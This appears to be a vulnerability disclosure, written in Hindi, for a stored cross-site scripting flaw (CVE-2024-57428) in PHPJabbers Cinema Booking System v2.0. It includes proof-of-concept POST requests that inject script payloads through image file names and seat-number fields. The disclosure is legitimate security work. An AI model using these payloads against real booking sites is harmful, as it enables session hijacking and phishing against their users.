
CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 में संग्रहीत XSS की समस्या है, जो लगातार जावास्क्रिप्ट इंजेक्शन को फ़िशिंग और मैलवेयर हमलों के लिए सक्षम करता है।
PHPJabbers Cinema Booking System v2.0 में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है, जो फ़ाइल अपलोड फ़ील्ड (event_img, seat_maps) और सीट संख्या कॉन्फ़िगरेशन (pjActionCreate में number[new_X]) में अस्वच्छित इनपुट के कारण उत्पन्न होती है। हमलावर स्थायी जावास्क्रिप्ट इंजेक्ट कर सकते हैं, जिससे फ़िशिंग, मैलवेयर इंजेक्शन और सत्र अपहरण हो सकता है।
भेद्य पैरामीटर: event_img और seat_maps's file name
संग्रहीत XSS प्रतिबिंबित XSS से अधिक गंभीर है, क्योंकि यह इंजेक्ट की गई सामग्री तक पहुँचने वाले सभी उपयोगकर्ताओं को प्रभावित करता है। इसका उपयोग लगातार फ़िशिंग हमलों, सत्र चोरी, या बड़े उपयोगकर्ता आधार पर मैलवेयर इंजेक्ट करने के लिए किया जा सकता है।
पेलोड: \">
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]
------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg
पेलोड: "><script>alert(x)</script>
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"
11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"
1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"
2"><script>alert(2)</script>2